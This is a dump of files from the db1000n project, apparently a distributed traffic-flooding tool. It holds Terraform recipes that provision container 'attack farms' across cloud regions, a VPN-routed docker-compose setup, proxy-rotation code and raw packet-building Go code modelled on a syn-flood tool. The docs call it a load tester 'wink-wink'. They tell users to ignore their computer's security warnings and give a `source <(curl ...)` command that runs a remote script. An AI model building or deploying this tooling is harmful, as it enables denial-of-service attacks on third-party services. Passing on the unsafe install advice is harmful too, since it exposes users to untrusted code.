"${CHECKSUM_DOWNLOAD_URL}" | xargs -n 1 curl -s -L -O 47 | 48 | if [ "${INSTALL_OS}" = "darwin" ] 49 | then 50 | SHA256_BINARY="shasum" 51 | SHA256_SUFFIX="-a 256" 52 | else 53 | SHA256_BINARY="sha256sum" 54 | SHA256_SUFFIX="" 55 | fi 56 | 57 | echo "Checking sha256 hash..." 58 | if ! command -v "${SHA256_BINARY}" &> /dev/null 59 | then 60 | echo "Warning: sha256sum/shasum not found. Could not check archive integrity. Please be careful when launching the executable." 61 | else 62 | # shellcheck disable=SC2086 63 | SHA256SUM=$(${SHA256_BINARY} ${SHA256_SUFFIX} ${ARCHIVE}) 64 | if ! grep -q "${SHA256SUM}" "${CHECKSUMS_FILE}"; then 65 | echo "shasum for ${ARCHIVE} failed. Please check the shasum. File may possibly be corrupted." 66 | exit 1 67 | fi 68 | fi 69 | 70 | tar xvf "${ARCHIVE}" 71 | echo "Successfully installed db1000n" 72 | -------------------------------------------------------------------------------- /examples/docker/static-docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | 3 | services: 4 | # creates privileged container 5 | autoheal: 6 | container_name: autoheal 7 | image: willfarrell/autoheal:1.2.0 8 | restart: always 9 | privileged: true 10 | volumes: 11 | - /var/run/docker.sock:/var/run/docker.sock:Z 12 | 13 | # creates OpenVPN Docker container to provider one of randomly picked .ovpn file 14 | ovpn: 15 | image: ghcr.io/wfg/openvpn-client:2.1.0 16 | cap_add: 17 | - NET_ADMIN 18 | security_opt: 19 | - label:disable 20 | restart: unless-stopped 21 | volumes: 22 | - /dev/net:/dev/net:z 23 | - ../../openvpn/:/data/vpn:z 24 | sysctls: 25 | - net.ipv6.conf.all.disable_ipv6=1 26 | environment: 27 | KILL_SWITCH: "on" 28 | HTTP_PROXY: "off" 29 | VPN_AUTH_SECRET: ovpn_secret 30 | VPN_CONFIG_PATTERN: "*.ovpn" # this will match country01.ovpn, country02.ovpn etc 31 | secrets: 32 | - ovpn_secret 33 | labels: 34 | autoheal: "true" 35 | healthcheck: 36 | test: ["CMD", "nslookup", "google.com", "8.8.8.8"] 37 | timeout: 10s 38 | interval: 30s 39 | retries: 3 40 | 41 | # run db1000n in updater mode, which will fetch configuration bypassing VPN and store it in shared volume 42 | updater: 43 | image: ghcr.io/arriven/db1000n 44 | restart: unless-stopped 45 | labels: 46 | autoheal: "true" 47 | volumes: 48 | - ../../config:/ko-app/config:z 49 | environment: 50 | UPDATER_DESTINATION_CONFIG: "/ko-app/config/config.json" 51 | UPDATER_MODE: "true" 52 | 53 | # this container will use VPN 54 | # it will use config.json created by 'updater' container above 55 | # this is set by specifying same volume and -c config/config.json 56 | programm: 57 | image: ghcr.io/arriven/db1000n 58 | restart: unless-stopped 59 | depends_on: 60 | ovpn: 61 | condition: service_healthy 62 | updater: 63 | condition: service_started 64 | network_mode: "service:ovpn" 65 | labels: 66 | autoheal: "true" 67 | environment: 68 | STRICT_COUNTRY_CHECK: "true" 69 | # set single or multiple countries to check IP against and exit container if IP matches country OR IP cannot be determined 70 | COUNTRY_LIST: "Country" 71 | CONFIG: "/ko-app/config/config.json" 72 | volumes: 73 | - ../../config:/ko-app/config:z 74 | 75 | secrets: 76 | ovpn_secret: 77 | file: ../../openvpn/auth.txt 78 | -------------------------------------------------------------------------------- /terraform/azure/README.md: -------------------------------------------------------------------------------- 1 | # Deploy via Azure 2 | 3 | ## Prerequisites 4 | 5 | - Install terraform 6 | - Have Azure account. 7 | - [Prepare environment for Azure Provider](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs) 8 | - [The easiest option for auth is Azure CLI](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/guides/azure_cli) 9 | 10 | ## Deployment 11 | 12 | The composition creates container instances in 6 different regions for a broader attack simulation. If you want to make a different setup, just alter modules in the `main.tf`. 13 | 14 | Create a new `terraform.tfvars` file in the folder, if you want to change the default configuration of the farm (`db1000n` can be configured with either command line parameters or environment variables, former having precedence over the latter): 15 | 16 | - `bomblet_count=10` - can be used for custom number of containers per region 17 | - `attack_commands=["/usr/src/app/db1000n","-c=https://link_to_your_config_file"]` 18 | - `attack_environment_variables={"ENABLE_PRIMITIVE":"false"}` 19 | 20 | `terraform init` - to restore all dependencies. 21 | 22 | `terraform apply -auto-approve` - to provision the attack farm. 23 | 24 | ## Collecting logs from the containers 25 | 26 | The container instances are provisioned without public IP addresses to make the setup more cost effective. 27 | If you deploy more than one container per region, play with the `-01` suffix to get logs from the correct instance. 28 | 29 | - Logs from North Europe region: 30 | 31 | ```sh 32 | az container logs --resource-group main-rg --name main-northeurope-01 --container-name main 33 | ``` 34 | 35 | - Logs from West Europe region: 36 | 37 | ```sh 38 | az container logs --resource-group main-rg --name main-westeurope-01 --container-name main 39 | ``` 40 | 41 | - Logs from Canada Central region: 42 | 43 | ```sh 44 | az container logs --resource-group main-rg --name main-canadacentral-01 --container-name main 45 | ``` 46 | 47 | - Logs from UAE North region: 48 | 49 | ```sh 50 | az container logs --resource-group main-rg --name main-uaenorth-01 --container-name main 51 | ``` 52 | 53 | - Logs from Central US region: 54 | 55 | ```sh 56 | az container logs --resource-group main-rg --name main-centralus-01 --container-name main 57 | ``` 58 | 59 | - Logs from East Asia region: 60 | 61 | ```sh 62 | az container logs --resource-group main-rg --name main-eastasia-01 --container-name main 63 | ``` 64 | 65 | ## Cleanup 66 | 67 | ```sh 68 | terraform destroy 69 | ``` 70 | -------------------------------------------------------------------------------- /src/core/packetgen/serialization.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package packetgen 24 | 25 | import ( 26 | "fmt" 27 | 28 | "github.com/google/gopacket" 29 | ) 30 | 31 | var opts = gopacket.SerializeOptions{ 32 | FixLengths: true, 33 | ComputeChecksums: true, 34 | } 35 | 36 | func SerializeLayers(payloadBuf gopacket.SerializeBuffer, layers ...gopacket.Layer) error { 37 | serializableLayers := make([]gopacket.SerializableLayer, 0, len(layers)) 38 | 39 | for _, layer := range layers { 40 | if layer == nil { 41 | continue 42 | } 43 | 44 | serializableLayer, err := toSerializable(layer) 45 | if err != nil { 46 | return err 47 | } 48 | 49 | serializableLayers = append(serializableLayers, serializableLayer) 50 | } 51 | 52 | return gopacket.SerializeLayers(payloadBuf, opts, serializableLayers...) 53 | } 54 | 55 | func Serialize(payloadBuf gopacket.SerializeBuffer, layer gopacket.Layer) error { 56 | serializable, err := toSerializable(layer) 57 | if err != nil { 58 | return err 59 | } 60 | 61 | return serializable.SerializeTo(payloadBuf, opts) 62 | } 63 | 64 | func toSerializable(layer gopacket.Layer) (gopacket.SerializableLayer, error) { 65 | serializable, ok := layer.(gopacket.SerializableLayer) 66 | if !ok { 67 | return nil, fmt.Errorf("layer is not serializable: %v", layer.LayerType()) 68 | } 69 | 70 | return serializable, nil 71 | } 72 | -------------------------------------------------------------------------------- /src/core/packetgen/link.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package packetgen 24 | 25 | import ( 26 | "fmt" 27 | "net" 28 | 29 | "github.com/google/gopacket" 30 | "github.com/google/gopacket/layers" 31 | 32 | "github.com/Arriven/db1000n/src/utils" 33 | ) 34 | 35 | func BuildLinkLayer(c LayerConfig) (gopacket.LinkLayer, error) { 36 | switch c.Type { 37 | case "": 38 | return nil, nil 39 | case "ethernet": 40 | var packetConfig EthernetPacketConfig 41 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 42 | return nil, err 43 | } 44 | 45 | return buildEthernetPacket(packetConfig), nil 46 | default: 47 | return nil, fmt.Errorf("unsupported link layer type %s", c.Type) 48 | } 49 | } 50 | 51 | // EthernetPacketConfig describes ethernet layer configuration 52 | type EthernetPacketConfig struct { 53 | SrcMAC string 54 | DstMAC string 55 | } 56 | 57 | // buildEthernetPacket generates an layers.Ethernet and returns it with source MAC address and destination MAC address 58 | func buildEthernetPacket(c EthernetPacketConfig) *layers.Ethernet { 59 | srcMac := net.HardwareAddr(c.SrcMAC) 60 | dstMac := net.HardwareAddr(c.DstMAC) 61 | 62 | return &layers.Ethernet{ 63 | SrcMAC: net.HardwareAddr{srcMac[0], srcMac[1], srcMac[2], srcMac[3], srcMac[4], srcMac[5]}, 64 | DstMAC: net.HardwareAddr{dstMac[0], dstMac[1], dstMac[2], dstMac[3], dstMac[4], dstMac[5]}, 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /.github/workflows/codeql-analysis.yml: -------------------------------------------------------------------------------- 1 | # For most projects, this workflow file will not need changing; you simply need 2 | # to commit it to your repository. 3 | # 4 | # You may wish to alter this file to override the set of languages analyzed, 5 | # or to provide custom queries or build logic. 6 | # 7 | # ******** NOTE ******** 8 | # We have attempted to detect the languages in your repository. Please check 9 | # the `language` matrix defined below to confirm you have the correct set of 10 | # supported CodeQL languages. 11 | # 12 | name: "CodeQL" 13 | 14 | on: 15 | push: 16 | branches: [ main, gh-pages ] 17 | pull_request: 18 | # The branches below must be a subset of the branches above 19 | branches: [ main ] 20 | schedule: 21 | - cron: '44 12 * * 3' 22 | 23 | jobs: 24 | analyze: 25 | name: Analyze 26 | runs-on: ubuntu-latest 27 | permissions: 28 | actions: read 29 | contents: read 30 | security-events: write 31 | 32 | strategy: 33 | fail-fast: false 34 | matrix: 35 | language: [ 'go' ] 36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] 37 | # Learn more about CodeQL language support at https://git.io/codeql-language-support 38 | 39 | steps: 40 | - name: Checkout repository 41 | uses: actions/checkout@v3 42 | 43 | # Initializes the CodeQL tools for scanning. 44 | - name: Initialize CodeQL 45 | uses: github/codeql-action/init@v1 46 | with: 47 | languages: ${{ matrix.language }} 48 | # If you wish to specify custom queries, you can do so here or in a config file. 49 | # By default, queries listed here will override any specified in a config file. 50 | # Prefix the list here with "+" to use these queries and those in the config file. 51 | # queries: ./path/to/local/query, your-org/your-repo/queries@main 52 | 53 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). 54 | # If this step fails, then you should remove it and run the build manually (see below) 55 | - name: Autobuild 56 | uses: github/codeql-action/autobuild@v1 57 | 58 | # ℹ️ Command-line programs to run using the OS shell. 59 | # 📚 https://git.io/JvXDl 60 | 61 | # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines 62 | # and modify them (or add more) to build your code if your project 63 | # uses a compiled language 64 | 65 | #- run: | 66 | # make bootstrap 67 | # make release 68 | 69 | - name: Perform CodeQL Analysis 70 | uses: github/codeql-action/analyze@v1 71 | -------------------------------------------------------------------------------- /docs/index.md: -------------------------------------------------------------------------------- 1 | # Quick start 2 | 3 | ## Death by 1000 needles 4 | 5 | On 24th of February Russia has launched a full-blown invasion on Ukrainian territory. We're doing our best to stop it and prevent innocent lives being taken 6 | 7 | !!! attention 8 | 9 | Please check existing issues (both open and closed) before creating new ones. It will save me some time answering duplicated questions and right now time is the most critical resource. Regards. 10 | 11 | --- 12 | 13 | ## Quickstart guide 14 | 15 | !!! attention 16 | 17 | This tool is responsible only for traffic generation, you may want to use VPN if you want to test geo-blocking 18 | 19 | ### For dummies 20 | 21 | 1. Download an application for your platform: 22 | 23 | - [Windows](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_windows_386.zip) 24 | - [Mac M1](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_darwin_arm64.tar.gz) 25 | - [Mac Intel](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_darwin_amd64.tar.gz) 26 | - [Linux 32bit](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_linux_386.zip) 27 | - [Linux 64bit](https://github.com/Arriven/db1000n/releases/latest/download/db1000n_linux_amd64.tar.gz) 28 | 29 | 1. Unpack the archive 30 | 1. Launch the file inside the archive 31 | 1. Done! 32 | 33 | !!! important 34 | 35 | Cloud providers could charge a huge amount of money not only for compute resources but for traffic as well. If you run an app in the cloud please control your billing (only advanced users are affected)! 36 | 37 | !!! info 38 | 39 | You can get warnings from your computer about the file - ignore them (or allow in System Settings). Our software is open source. It can be checked and compiled by you yourself. 40 | 41 | --- 42 | 43 | ## How to install db1000n 44 | 45 | There are different ways to install and run `db1000n` 46 | 47 | ### Binary file 48 | 49 | Download the [latest release](https://github.com/Arriven/db1000n/releases/latest) for your arch/OS. 50 | Unpack the archive and run it 51 | 52 | ### Docker 53 | 54 | If you already have installed Docker, just run: 55 | 56 | ```bash 57 | docker run --rm -it --pull always ghcr.io/arriven/db1000n 58 | ``` 59 | 60 | Or, if your container is not able to connect to your local VPN: 61 | 62 | ```bash 63 | docker run --rm -it --pull always --network host ghcr.io/arriven/db1000n 64 | ``` 65 | 66 | ### Advanced users 67 | 68 | See [For advanced](/db1000n/advanced-docs/advanced-and-devs/) 69 | 70 | --- 71 | 72 | ## I still have questions 73 | 74 | You will find some answers on our [FAQ](/db1000n/faq/) 75 | 76 | --- 77 | -------------------------------------------------------------------------------- /terraform/azure/main.tf: -------------------------------------------------------------------------------- 1 | provider "azurerm" { 2 | features {} 3 | } 4 | 5 | resource "azurerm_resource_group" "main" { 6 | name = "${var.prefix}-rg" 7 | location = "northeurope" 8 | } 9 | 10 | module "bomblet" { 11 | source = "./bomblet" 12 | 13 | bomblet_count = var.bomblet_count 14 | region = "northeurope" 15 | prefix = var.prefix 16 | resource_group_name = azurerm_resource_group.main.name 17 | attack_commands = var.attack_commands 18 | attack_environment_variables = var.attack_environment_variables 19 | } 20 | 21 | module "bomblet_we" { 22 | source = "./bomblet" 23 | 24 | bomblet_count = var.bomblet_count 25 | region = "westeurope" 26 | prefix = var.prefix 27 | resource_group_name = azurerm_resource_group.main.name 28 | attack_commands = var.attack_commands 29 | attack_environment_variables = var.attack_environment_variables 30 | } 31 | 32 | module "bomblet_cc" { 33 | source = "./bomblet" 34 | 35 | bomblet_count = var.bomblet_count 36 | region = "canadacentral" 37 | prefix = var.prefix 38 | resource_group_name = azurerm_resource_group.main.name 39 | attack_commands = var.attack_commands 40 | attack_environment_variables = var.attack_environment_variables 41 | } 42 | 43 | module "bomblet_uae" { 44 | source = "./bomblet" 45 | 46 | bomblet_count = var.bomblet_count 47 | region = "uaenorth" 48 | prefix = var.prefix 49 | resource_group_name = azurerm_resource_group.main.name 50 | attack_commands = var.attack_commands 51 | attack_environment_variables = var.attack_environment_variables 52 | } 53 | 54 | module "bomblet_cu" { 55 | source = "./bomblet" 56 | 57 | bomblet_count = var.bomblet_count 58 | region = "centralus" 59 | prefix = var.prefix 60 | resource_group_name = azurerm_resource_group.main.name 61 | attack_commands = var.attack_commands 62 | attack_environment_variables = var.attack_environment_variables 63 | } 64 | 65 | module "bomblet_ea" { 66 | source = "./bomblet" 67 | 68 | bomblet_count = var.bomblet_count 69 | region = "eastasia" 70 | prefix = var.prefix 71 | resource_group_name = azurerm_resource_group.main.name 72 | attack_commands = var.attack_commands 73 | attack_environment_variables = var.attack_environment_variables 74 | } 75 | -------------------------------------------------------------------------------- /docs/advanced-docs/advanced-and-devs.md: -------------------------------------------------------------------------------- 1 | # Advanced and devs 2 | 3 | ## For developers 4 | 5 | _Developed by [Arriven](https://github.com/Arriven)._ 6 | 7 | This is a simple distributed load generation client written in go. 8 | It is able to fetch simple json config from a local or remote location. 9 | The config describes which load generation jobs should be launched in parallel. 10 | There are other tools doing that. 11 | I do not intend to copy or replace them but rather provide a simple open source alternative so that users have more options. 12 | Feel free to use it in your load tests (wink-wink). 13 | 14 | The software is provided as is under no guarantee. 15 | I will update both the repo and this doc as I go during following days (date of writing this is 26th of February 2022, third day of Russian invasion into Ukraine). 16 | 17 | ## Go installation 18 | 19 | Run command in your terminal: 20 | 21 | ```bash 22 | go install github.com/Arriven/db1000n@latest 23 | ~/go/bin/db1000n 24 | ``` 25 | 26 | ## Shell installation 27 | 28 | Run install script directly into the shell (useful for installation through SSH): 29 | 30 | ```bash 31 | source <(curl https://raw.githubusercontent.com/Arriven/db1000n/main/install.sh) 32 | ``` 33 | 34 | The command above will detect the OS and architecture, download the archive, validate it, and extract `db1000n` executable into the working directory. 35 | You can run it via this command: 36 | 37 | ```bash 38 | ./db1000n 39 | ``` 40 | 41 | ## Docker + OpenVPN 42 | 43 | How to install docker: [https://docs.docker.com/get-docker/](https://docs.docker.com/get-docker/) 44 | 45 | Make sure you've set all available resources to docker: 46 | 47 | - [Windows](https://docs.docker.com/desktop/windows/#resources) 48 | - [Mac](https://docs.docker.com/desktop/mac/#resources) 49 | - [Linux](https://docs.docker.com/desktop/linux/#resources) 50 | 51 | See [docker-vpn](docker-vpn.md) for instructions on setting it up 52 | 53 | ## Kubernetes 54 | 55 | Here possible ways to deploy into it 56 | 57 | - [Helm Chart](/db1000n/advanced-docs/kubernetes/helm-charts/) 58 | - [Manifest](/db1000n/advanced-docs/kubernetes/manifests/) 59 | 60 | ## Public Clouds 61 | 62 | See possible ways to deploy into public clouds 63 | 64 | - [AWS](/db1000n/advanced-docs/terraform/aws/) 65 | - [Azure](/db1000n/advanced-docs/terraform/azure/) 66 | - [Digital Ocean](/db1000n/advanced-docs/terraform/digital-ocean/) 67 | - [Googls Cloud Platform](/db1000n/advanced-docs/terraform/gcp/) 68 | - [Heroku](/db1000n/advanced-docs/terraform/heroku/) 69 | 70 | ## See also 71 | 72 | - [db1000nX100](https://github.com/ihorlv/db1000nX100) - a project that automates VPN rotation for db1000n instances that allows you to generate geographically distributed traffic (i.e. to stress test geo-blocking) 73 | -------------------------------------------------------------------------------- /src/utils/proxy.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "math/rand" 7 | "net" 8 | "net/url" 9 | "strings" 10 | "time" 11 | 12 | "github.com/valyala/fasthttp/fasthttpproxy" 13 | "golang.org/x/net/proxy" 14 | "h12.io/socks" 15 | ) 16 | 17 | type ProxyFunc func(network, addr string) (net.Conn, error) 18 | 19 | type ProxyParams struct { 20 | URLs string 21 | DefaultProto string 22 | LocalAddr string 23 | Interface string 24 | Timeout time.Duration 25 | } 26 | 27 | // this won't work for udp payloads but if people use proxies they might not want to have their ip exposed 28 | // so it's probably better to fail instead of routing the traffic directly 29 | func GetProxyFunc(ctx context.Context, params ProxyParams, protocol string) ProxyFunc { 30 | direct := &net.Dialer{Timeout: params.Timeout, LocalAddr: resolveAddr(protocol, params.LocalAddr), Control: BindToInterface(params.Interface)} 31 | if params.URLs == "" { 32 | return proxy.FromEnvironmentUsing(direct).Dial 33 | } 34 | 35 | proxies := strings.Fields(strings.ReplaceAll(params.URLs, ",", " ")) 36 | 37 | // We need to dial new proxy on each call 38 | return func(network, addr string) (net.Conn, error) { 39 | selected := proxies[rand.Intn(len(proxies))] //nolint:gosec // Cryptographically secure random not required 40 | 41 | u, err := url.Parse(selected) 42 | if err != nil { 43 | selected = params.DefaultProto + "://" + selected 44 | 45 | u, err = url.Parse(selected) 46 | if err != nil { 47 | return nil, fmt.Errorf("error building proxy %v: %w", selected, err) 48 | } 49 | } 50 | 51 | switch u.Scheme { 52 | case "socks5", "socks5h": 53 | client, err := proxy.FromURL(u, direct) 54 | if err != nil { 55 | return nil, fmt.Errorf("error building proxy %v: %w", u.String(), err) 56 | } 57 | 58 | return client.Dial(network, addr) 59 | case "socks4", "socks4a": 60 | return socks.Dial(u.String())(network, addr) 61 | default: 62 | // Not all http proxies support tunneling so it's safer to skip them for raw tcp payload 63 | if protocol == "http" { 64 | return fasthttpproxy.FasthttpHTTPDialerTimeout(u.Host, params.Timeout)(addr) 65 | } 66 | 67 | return nil, fmt.Errorf("unsupported proxy scheme %v", u.Scheme) 68 | } 69 | } 70 | } 71 | 72 | func resolveAddr(protocol, addr string) net.Addr { 73 | if addr == "" { 74 | return nil 75 | } 76 | 77 | var zone string 78 | 79 | // handle ipv6 zone 80 | if strings.Contains(addr, "%") { 81 | split := strings.Split(addr, "%") 82 | addr, zone = split[0], split[1] 83 | } 84 | 85 | ip := net.ParseIP(addr) 86 | 87 | switch protocol { 88 | case "tcp", "tcp4", "tcp6", "http": 89 | return &net.TCPAddr{IP: ip, Zone: zone} 90 | case "udp", "udp4", "udp6": 91 | return &net.UDPAddr{IP: ip, Zone: zone} 92 | default: 93 | return &net.IPAddr{IP: ip} 94 | } 95 | } 96 | -------------------------------------------------------------------------------- /src/core/packetgen/packetgen.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | // Package packetgen [allows sending customized tcp/udp traffic. Inspired by https://github.com/bilalcaliskan/syn-flood] 24 | package packetgen 25 | 26 | import ( 27 | "net" 28 | 29 | "github.com/google/gopacket" 30 | ) 31 | 32 | // Common protocol header sizes to help with metrics 33 | const ( 34 | TCPHeaderSize = 25 // 20 for header + at least 5 for options 35 | UDPHeaderSize = 8 36 | IPHeaderSize = 20 37 | ) 38 | 39 | type Packet struct { 40 | Link gopacket.LinkLayer 41 | Network gopacket.NetworkLayer 42 | Transport gopacket.TransportLayer 43 | Payload gopacket.Layer 44 | } 45 | 46 | type LayerConfig struct { 47 | Type string 48 | Data map[string]any 49 | } 50 | 51 | type PacketConfig struct { 52 | Link LayerConfig 53 | Network LayerConfig 54 | Transport LayerConfig 55 | Payload LayerConfig 56 | } 57 | 58 | func (c PacketConfig) Build() (result Packet, err error) { 59 | if result.Link, err = BuildLinkLayer(c.Link); err != nil { 60 | return Packet{}, err 61 | } 62 | 63 | if result.Network, err = BuildNetworkLayer(c.Network); err != nil { 64 | return Packet{}, err 65 | } 66 | 67 | if result.Transport, err = BuildTransportLayer(c.Transport, result.Network); err != nil { 68 | return Packet{}, err 69 | } 70 | 71 | if result.Payload, err = BuildPayload(c.Payload); err != nil { 72 | return Packet{}, err 73 | } 74 | 75 | return result, nil 76 | } 77 | 78 | func (p Packet) Serialize(payloadBuf gopacket.SerializeBuffer) (err error) { 79 | return SerializeLayers(payloadBuf, p.Link, p.Network, p.Transport, p.Payload) 80 | } 81 | 82 | func (p Packet) IP() net.IP { 83 | return p.Network.NetworkFlow().Dst().Raw() 84 | } 85 | -------------------------------------------------------------------------------- /terraform/aws_eks/README.md: -------------------------------------------------------------------------------- 1 | # AWS EKS deployment 2 | 3 | ## Description 4 | 5 | This implementation allows you to create entire AWS infrastructure from scratch 6 | and provides Kubernetes cluster (EKS) to deploy **db1000n** project. 7 | 8 | ## Prerequisites 9 | 10 | - AWS account with **AdministratorAccess** permissions 11 | - OS Linux or Windows 12 | - [AWS CLI](https://docs.aws.amazon.com/cli/v1/userguide/cli-chap-install.html) 13 | - [Terraform](https://learn.hashicorp.com/tutorials/terraform/install-cli) 14 | - [Helm](https://helm.sh/docs/intro/install/) 15 | - [kubectl](https://kubernetes.io/docs/tasks/tools/) 16 | 17 | ## Configure AWS profile 18 | 19 | The following example shows sample values: 20 | 21 | ```bash 22 | $ aws configure 23 | AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE 24 | AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY 25 | Default region name [None]: us-west-2 26 | Default output format [None]: json 27 | ``` 28 | 29 | ## Deployment 30 | 31 | ### Deploy infrastructure 32 | 33 | ```bash 34 | cd db1000n/terraform/aws/eks-cluster/ 35 | terraform init 36 | terraform plan 37 | terraform apply 38 | ``` 39 | 40 | **NOTE:** You can create multilpe `*.tfvars` configuration files with various variables, regions and AWS accounts 41 | using `terraform workspace` command: 42 | 43 | ```bash 44 | cd db1000n/terraform/aws/eks-cluster/ 45 | terraform init 46 | terraform workspace new $your_workspace 47 | terraform plan -var-file $your_file.tfvars 48 | terraform apply -var-file $your_file.tfvars 49 | ``` 50 | 51 | ### Update kubeconfig 52 | 53 | ```bash 54 | aws --profile $your_aws_profile eks update-kubeconfig --name $your_eks_cluster_name 55 | ``` 56 | 57 | ### Connect to EKS cluster 58 | 59 | ```bash 60 | $ kubectl get nodes 61 | NAME STATUS ROLES AGE VERSION 62 | ip-xxx-xxx-x-xx.us-east-1.compute.internal Ready 107m v1.21.5-eks-9017834 63 | ip-xxx-xxx-x-xx.us-east-1.compute.internal Ready 107m v1.21.5-eks-9017834 64 | ip-xxx-xxx-x-xx.us-east-1.compute.internal Ready 107m v1.21.5-eks-9017834 65 | ``` 66 | 67 | ### Install application 68 | 69 | ```bash 70 | $ cd db1000n/kubernetes/helm-charts/ 71 | $ helm upgrade --install \ 72 | --create-namespace \ 73 | --namespace=db1000n \ 74 | -f values.yaml db1000n . 75 | ``` 76 | 77 | ### Check installation 78 | 79 | ```bash 80 | $ kubectl -n db1000n get pods 81 | NAME READY STATUS RESTARTS AGE 82 | db1000n-54d8744b54-8hffr 1/1 Running 0 2m10s 83 | db1000n-54d8744b54-8vml4 1/1 Running 0 2m10s 84 | db1000n-54d8744b54-9stzv 1/1 Running 0 2m10s 85 | ``` 86 | 87 | ## Deletion 88 | 89 | ### Delete application 90 | 91 | ```bash 92 | helm uninstall db1000n -n db1000n 93 | ``` 94 | 95 | ### Delete infrastructure 96 | 97 | ```bash 98 | terraform destroy 99 | ``` 100 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-nodes/variables.tf: -------------------------------------------------------------------------------- 1 | variable "autoscale_group_name" { 2 | description = "Name to use for the auto scale group" 3 | } 4 | 5 | variable "cluster_name" { 6 | description = "EKS cluster name" 7 | } 8 | 9 | variable "cluster_version" { 10 | description = "EKS cluster version" 11 | } 12 | 13 | variable "cluster_endpoint" { 14 | description = "EKS cluster endpoint" 15 | } 16 | 17 | variable "cluster_ca_data" { 18 | description = "EKS cluster certificate authority" 19 | } 20 | 21 | variable "vpc_id" { 22 | description = "VPC ID" 23 | } 24 | 25 | variable "source_security_groups" { 26 | description = "A list of source security groups which can connect to the EKS nodes" 27 | } 28 | 29 | variable "subnets" { 30 | description = "A list of subnets to place the EKS nodes" 31 | type = list(string) 32 | } 33 | 34 | variable "key_name" { 35 | description = "SSH key name" 36 | } 37 | 38 | variable "public_key" { 39 | description = "SSH public key" 40 | } 41 | 42 | variable "ami_id" { 43 | description = "The AMI from which to launch the instances" 44 | default = "" 45 | } 46 | 47 | variable "instance_type" { 48 | description = "The type of the instance" 49 | } 50 | 51 | variable "device_name" { 52 | description = "The name of the device to mount." 53 | default = "/dev/xvda" 54 | } 55 | 56 | variable 